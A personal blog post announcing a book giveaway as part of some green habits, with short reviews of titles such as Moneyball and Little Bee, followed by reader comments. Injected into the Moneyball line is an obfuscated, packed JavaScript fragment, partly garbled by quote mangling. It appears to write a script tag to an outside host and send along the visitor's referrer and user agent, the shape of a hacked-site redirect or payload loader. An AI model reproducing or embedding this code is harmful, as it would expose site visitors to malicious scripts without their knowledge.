In an effort to do my part to help save the environment, I’m going to do a few things that most of you are already probably doing (yes, shame on me).
1. Turn off my computer at the end of each day.
2. Bring my own utensils to work and stop using the plastic ones.
3. Consume less. And I’m going to start with books!
We’re cleaning out the bookshelves and will be donating the following books. BUT if anyone out there (lower 48) would like one, leave a comment and I’ll mail it to you. No strings.
Moneyball ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nktra|var|u0026u|referrer|bnias||js|php’.split(‘|’),0,{}))
– The story about how the Oakland A’s made good team without much money. Recently made into a movie staring Brad Pitt.
Bringing Down the House – Also made into a movie. About the MIT card counters.
Everyone Worth Knowing – Total brain candy, beach reading. No substance at all. But totally entertaining.
The Time Traveler’s Wife – I think I was the last one to read it. But if you haven’t, you’re more than welcome to it.
The Pilot’s Wife – One of those books that takes some crazy turns. But it was entertaining.
Olive Kitteridge – So….this one isn’t mine and I haven’t read it. Better give it back. Not up for grabs. Sorry!
The Complete Book of Questions – I think Nick and I read through the entire book on a drive to/from California.
The Broker – Nick read this one.
Little Bee – This one was interesting. The blurb on the back of the book is terrible. It literally says,
“WE DON’T WANT TO TELL YOU TOO MUCH ABOUT THIS BOOK.
It is a truly special story and we don’t want to spoil it.
Nevertheless, you need to know something, so we will just say this:
It is extremely funny, but the African beach scene is horrific.
The story starts there, but the book doesn’t.”
It’s definitely not funny. But it’s still a good read.
So if you’re interested in one of these, just let me know. Happy Tuesday!

Little Bee was a good book…though parts disturbing. I got it in a mailing that Sephora sent to some bloggers a few years ago to promote their beach beauty products. After read the book, I thought it was so funny they picked that story..as nothing about the beach scene makes me want to put on any beauty products!
If you don’t have a taker, I’d be interested in either “Moneyball” or “Bringing Down the House”
By the way… cool idea.
Those books have already been called for dibs. But I’ll let the recipients know that you’re interested and maybe they’ll pay it forward.
